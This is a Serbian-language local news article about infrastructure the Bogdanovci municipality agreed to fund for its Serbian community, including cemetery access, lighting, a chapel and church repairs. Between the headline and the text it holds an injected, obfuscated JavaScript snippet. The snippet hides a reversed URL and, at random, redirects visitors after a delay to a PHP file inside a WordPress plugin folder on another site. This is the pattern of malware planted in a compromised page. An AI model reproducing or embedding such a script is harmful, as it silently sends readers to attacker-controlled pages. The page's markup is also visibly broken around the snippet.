Usaglašeni infrastrukturni projekti u srpskim naseljima bogdanovačke opštine

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to” role=”none”>
to je načelnik Barun najavio da će u opštinski budžet za 2022. godinu biti uvršteno izrađivanje projektne dokumentacije za građenje puta do pravoslavnog groblja u Petrovcima te javne rasvete i parkinga oko pravoslavnog groblja. Delegacija je tražila i finansijska sredstva za rad Veća u ovoj opštini, što im je takođe obećano da će biti ispunjeno.
Takođe je usagkašeno da će se, nakon izgradnje pristupne ceste, javne rasvete i parking prostora vezano za groblje u Petrovcima, ići u izgradnju kapele za potrebe pravoslavnih Srba sa tog područja, a nastaviće se ulaganje u sanaciju pravoslavne crkve u Petrovcima.
Dogovoreno je da će većnik SDSS-a u opštinskom veću opštine Bogdanovci i predsednik VSNM te opštine Boris Grbić organizovati u skorije vreme sastanak, odnosno tribinu na koju će pozvati sve stanovnike opštine Bogdanovci srpske nacionalnosti gde će im se obratiti načelnik opštine te prezentovati šta se planira uraditi, a da je od značaja za tamošnju srpsku zajednicu. Načelnik opštine izrazio je želju za saradnju sa Vukovarsko – sremskom županijom po određenim pitanjima, ali i sa predstavnicima srpskih institucija u realizaciji određenih projekata.
tekst i foto: Dušan LATAS